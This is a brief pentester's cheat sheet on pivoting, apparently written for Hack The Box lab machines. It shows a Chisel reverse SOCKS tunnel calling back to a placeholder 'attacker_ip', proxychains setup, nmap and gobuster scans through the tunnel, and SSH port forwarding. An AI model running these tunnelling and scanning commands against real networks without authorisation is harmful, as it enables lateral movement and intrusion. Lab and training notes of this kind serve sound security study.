Links

Pivot

Chisel :
################################# Attacker Machine ###############################
​
./chisel server -p 8080 --reverse
​
#################################### Pivot Machine ################################
​
chisel.exe client attacker_ip:8080 R:socks
​
############################### Proxychains.conf #################################
​
socks5 127.0.0.1 1080
​
################################## Nmap Scan ####################################
​
Always better to transfer binaries and scan from the pivot
​
nmap.exe -sC -sV 10.10.10.10 -Pn -T5 // From Pivot machine
​
proxychains nmap 10.10.10.10 -T5 -Pn -sT // From Kali Machine
​
################################### Gobuster ####################################
​
gobuster dir -u http://10.10.10.10 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -p socks5://127.0.0.1:1080
Pivot via SSH key (HTB Nibbles)
  • ssh -i root.key -L9000:web_ip:port ssh_ip
    • Ex : ssh -i root.key -L9000:10.10.10.75:80 10.10.10.73
Pivot via root password (HTB Sense)
  • ssh -D1080 pivot_ip
  • Burp -> user options -> socks proxy -> use socks proxy
  • vi /etc/proxychains.conf
  • Change socks4(metasploit) to socks5(ssh)
  • proxychains curl -k https://10.10.10.60 [ -k to ignore SSL]